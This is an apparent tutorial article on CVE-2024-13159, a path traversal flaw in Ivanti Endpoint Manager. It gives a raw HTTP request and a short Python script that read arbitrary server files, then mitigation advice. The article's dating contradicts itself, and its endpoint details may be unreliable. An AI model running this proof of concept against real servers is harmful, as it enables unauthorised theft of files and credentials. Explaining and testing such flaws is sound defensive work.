Ivanti Endpoint Manager (EPM) is widely adopted for IT asset management and endpoint security. In early 2024, researchers discovered a critical vulnerability tracked as CVE-2024-13159. This flaw enables remote, unauthenticated attackers to leak sensitive files from the EPM server via absolute path traversal—no password required.
In this guide, we’ll break down what CVE-2024-13159 is, how it’s exploited, see a code sample, and explain how you can protect yourself. This is a simple, exclusive article for IT practitioners and security folks.
Ivanti EPM *2022 SU6* (before January-2025 Security Update)
- Impact: Remote attackers can read sensitive files from the server (e.g., Windows SAM, config files, private keys...)
Attack Prerequisite: No authentication needed—anyone can try!
The attacker tricks EPM’s web components into reading a file path of their choice and sends its contents back in the HTTP response.
Why "Absolute Path Traversal"?
"Absolute path traversal" means hackers can reference exact file locations, like "C:\Windows\System32\config\SAM" or "/etc/passwd" (on Linux). Normal web applications restrict file access to certain safe folders—this bug skips those checks.
NVD CVE Page:
https://nvd.nist.gov/vuln/detail/CVE-2024-13159
Ivanti Security Advisory:
https://forums.ivanti.com/s/article/KB-CVE-2024-13159
Third-party Analysis (Horizon3AI):
https://www.horizon3.ai/cve-2024-13159-path-traversal/
Technical Details: How Does It Work?
The vulnerable EPM endpoint (e.g., FileStoreService) accepts a file path from a URL parameter or body, and doesn’t sanitize it. That means you can supply any path you want.
Sample Vulnerable URL
https://<EPM-SERVER>/FileStoreService?operation=getfile&filename=C:\windows\win.ini
Instead, the user sends an *absolute* path
The server reads the file and sends it back in the response.
Exploit Example: Dumping win.ini on Windows
Let’s exploit a *test* EPM server (never target production, always get permission!).
Step 1: Target the Vulnerable Endpoint
Suppose your EPM is at https://epm.lab.local:443
Send the following GET request
GET /FileStoreService?operation=getfile&filename=C:\windows\win.ini HTTP/1.1
Host: epm.lab.local
If successful, you’ll receive the contents of win.ini in the response.
Quick script to test
import requests
target = "https://epm.lab.local/FileStoreService";
params = {
"operation": "getfile",
"filename": r"C:\windows\win.ini"
}
response = requests.get(target, params=params, verify=False)
if response.status_code == 200:
print("File contents:\n")
print(response.text)
else:
print("Error:", response.status_code)
Want to read something sensitive? Change the path, for example
"C:\\ProgramData\\Ivanti\\EPM\\core\\core.sdf"
Warning: Do not use for malicious purposes. Only on systems you own or have explicit permission.
Private keys & secrets
This can quickly lead to further exploitation or even full server compromise!
Mitigation & Protection
Fix:
Apply the January 2025 (or later) Security Update from Ivanti for both EPM mainline and 2022 SU6 branches.
Official Ivanti Update Info
Temporary Workarounds
- Restrict external access to EPM web interface via firewall/VPN
- Monitor web logs for suspicious paths like C:\ or ../
- Remove/disable unused EPM web endpoints if feasible
Test:
After patching, re-run above PoC. A secure system will return 404 Not Found or a generic error, not the file content.
Conclusion
CVE-2024-13159 should be urgently addressed—the risk is high and exploitation is easy for anyone with access to your EPM server. Patch now, monitor access, and review file exposure practices.
For further deep dive, check the Ivanti official forum or security research from Horizon3AI.
Timeline
Published on: 01/14/2025 18:15:26 UTC
Last modified on: 03/13/2025 15:28:42 UTC